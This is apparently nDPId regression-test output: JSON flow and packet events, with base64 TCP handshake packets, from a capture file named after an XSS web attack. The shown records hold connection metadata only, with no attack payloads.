-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4495,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347375388,"flow_last_seen":1499347380720,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347505780,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56522,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4495,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347375388,"flow_last_seen":1499347380720,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347505780,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56522,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4495,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347376638,"flow_last_seen":1499347381720,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347505780,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56536,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4495,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347376638,"flow_last_seen":1499347381720,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347505780,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56536,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4495,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347379171,"flow_last_seen":1499347384721,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347505780,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56562,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4495,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347379171,"flow_last_seen":1499347384721,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347505780,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56562,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4495,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347380424,"flow_last_seen":1499347385722,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347505780,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56576,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4495,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347380424,"flow_last_seen":1499347385722,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347505780,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56576,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4495,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":243,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347381694,"flow_last_seen":1499347386722,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347505780,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56590,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4495,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":243,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347381694,"flow_last_seen":1499347386722,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347505780,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56590,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4495,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347384186,"flow_last_seen":1499347389723,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347505780,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56616,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4495,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347384186,"flow_last_seen":1499347389723,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347505780,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56616,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4507,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":318,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347508344,"flow_last_seen":1499347508344,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347508344,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57940,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4507,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":318,"flow_packet_id":1,"flow_last_seen":1499347508344,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347508344,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8QeJAAD4Gg+6sEAABwKgKMuJUAFDv7LYIAAAAAKACchDdRAAAAgQFtAQCCAoBOvfqAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4508,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":318,"flow_packet_id":2,"flow_last_seen":1499347508344,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347508344,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4lSsQaQu7+y2CaAScSDAbwAAAgQFtAQCCAoD5MlfATr36gEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4509,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":318,"flow_packet_id":3,"flow_last_seen":1499347508345,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347508345,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0QeNAAD4Gg\/WsEAABwKgKMuJUAFDv7LYJrEGkL4AQAOVfdwAAAQEICgE69+oD5Mlf"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4519,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":319,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347509601,"flow_last_seen":1499347509601,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347509601,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57954,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4519,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":319,"flow_packet_id":1,"flow_last_seen":1499347509601,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347509601,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8U2ZAAD4GcmqsEAABwKgKMuJiAFBgjKpCAAAAAKACchB3IwAAAgQFtAQCCAoBOvkkAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4520,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":319,"flow_packet_id":2,"flow_last_seen":1499347509601,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347509601,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4mJHoK+XYIyqQ6AScSCyTAAAAgQFtAQCCAoD5MqZATr5JAEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4521,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":319,"flow_packet_id":3,"flow_last_seen":1499347509602,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347509602,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0U2dAAD4GcnGsEAABwKgKMuJiAFBgjKpDR6CvmIAQAOVRVAAAAQEICgE6+SQD5MqZ"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4540,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":320,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347512081,"flow_last_seen":1499347512081,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347512081,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57980,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4540,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":320,"flow_packet_id":1,"flow_last_seen":1499347512081,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347512081,"pkt":"ABm5CmnxAMGxFOsxCABFAAA87jVAAD4G15qsEAABwKgKMuJ8AFAKmxWlAAAAAKACchBfLAAAAgQFtAQCCAoBOvuQAAAAAAEDAwc="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4541,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":320,"flow_packet_id":2,"flow_last_seen":1499347512081,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347512081,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4nwCiqB4CpsVpqAScSDsHgAAAgQFtAQCCAoD5M0FATr7kAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4542,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":320,"flow_packet_id":3,"flow_last_seen":1499347512082,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347512082,"pkt":"ABm5CmnxAMGxFOsxCABFAAA07jZAAD4G16GsEAABwKgKMuJ8AFAKmxWmAoqgeYAQAOWLJgAAAQEICgE6+5AD5M0F"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4549,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":321,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347513353,"flow_last_seen":1499347513353,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347513353,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57994,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4549,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":321,"flow_packet_id":1,"flow_last_seen":1499347513353,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347513353,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8ef1AAD4GS9OsEAABwKgKMuKKAFAHuIUzAAAAAKACchDxNAAAAgQFtAQCCAoBOvzOAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4550,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":321,"flow_packet_id":2,"flow_last_seen":1499347513353,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347513353,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4oqWR\/ViB7iFNKAScSCUQQAAAgQFtAQCCAoD5M5DATr8zgEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4551,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":321,"flow_packet_id":3,"flow_last_seen":1499347513353,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347513353,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0ef5AAD4GS9qsEAABwKgKMuKKAFAHuIU0lkf1Y4AQAOUzSQAAAQEICgE6\/M4D5M5D"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4561,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":322,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347514648,"flow_last_seen":1499347514648,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347514648,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58008,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4561,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":322,"flow_packet_id":1,"flow_last_seen":1499347514648,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347514648,"pkt":"ABm5CmnxAMGxFOsxCABFAAA81oFAAD4G706sEAABwKgKMuKYAFBs5yiTAAAAAKACchDnUwAAAgQFtAQCCAoBOv4SAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4562,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":322,"flow_packet_id":2,"flow_last_seen":1499347514648,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347514648,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4pgH3WT1bOcolKAScSCn9AAAAgQFtAQCCAoD5M+HATr+EgEDAwc="} 
-00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4563,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":322,"flow_packet_id":3,"flow_last_seen":1499347514648,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347514648,"pkt":"ABm5CmnxAMGxFOsxCABFAAA01oJAAD4G71WsEAABwKgKMuKYAFBs5yiUB91k9oAQAOVG\/AAAAQEICgE6\/hID5M+H"} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4576,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":245,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347385481,"flow_last_seen":1499347390723,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347515907,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56630,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4576,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":245,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347385481,"flow_last_seen":1499347390723,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347515907,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56630,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4576,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":246,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347386736,"flow_last_seen":1499347392723,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347515907,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56644,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4576,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":246,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347386736,"flow_last_seen":1499347392723,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347515907,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56644,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4576,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":247,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347389305,"flow_last_seen":1499347394723,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347515907,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56670,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4576,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":247,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347389305,"flow_last_seen":1499347394723,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347515907,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56670,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4576,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":248,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347390580,"flow_last_seen":1499347395724,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347515907,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56684,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4576,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":248,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347390580,"flow_last_seen":1499347395724,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347515907,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56684,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4576,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":249,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347393135,"flow_last_seen":1499347398725,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347515907,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56710,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4576,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":249,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347393135,"flow_last_seen":1499347398725,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347515907,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56710,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4576,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":250,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347394398,"flow_last_seen":1499347399725,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347515907,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56724,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4576,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":250,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347394398,"flow_last_seen":1499347399725,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347515907,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56724,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4579,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":323,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347517171,"flow_last_seen":1499347517171,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347517171,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58034,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4579,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":323,"flow_packet_id":1,"flow_last_seen":1499347517171,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347517171,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8PfRAAD4Gh9ysEAABwKgKMuKyAFAJ1z18AAAAAKACchAy6wAAAgQFtAQCCAoBOwCIAAAAAAEDAwc="} 
